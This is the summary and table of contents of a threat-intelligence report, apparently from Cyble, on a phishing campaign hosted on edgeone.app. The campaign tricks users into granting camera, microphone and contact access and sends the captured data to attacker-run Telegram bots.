Cyble Research & Intelligence Labs has uncovered an active phishing campaign hosted on edgeone.app infrastructure that goes beyond credential theft. Using deceptive lures like 'ID Scanner,' 'Telegram ID Freezing,' and 'Health Fund AI,' the campaign tricks users into granting browser-level camera, microphone, and contact permissions. Once granted, embedded JavaScript silently captures photos, video, audio, device fingerprints, geolocation, and contact lists, then exfiltrates everything to attacker-controlled Telegram bots via the Telegram Bot API. The campaign impersonates TikTok, Telegram, Instagram, Google Chrome/Drive, and Flappy Bird. Code analysis suggests AI-assisted development, evidenced by structured annotations and emoji-based formatting in the malicious scripts. Harvested biometric and multimedia data could enable identity fraud, deepfake attacks, video-KYC bypass, extortion, and targeted social engineering. MITRE ATT&CK techniques and IOCs are provided.
Table of contents
Executive SummaryKey TakeawaysOverviewBusiness Impact and Potential AbuseWhy does this matter?Technical AnalysisConclusionOur RecommendationsMITRE ATT&CK® TechniquesIndicators of Compromise (IOCs)Sort: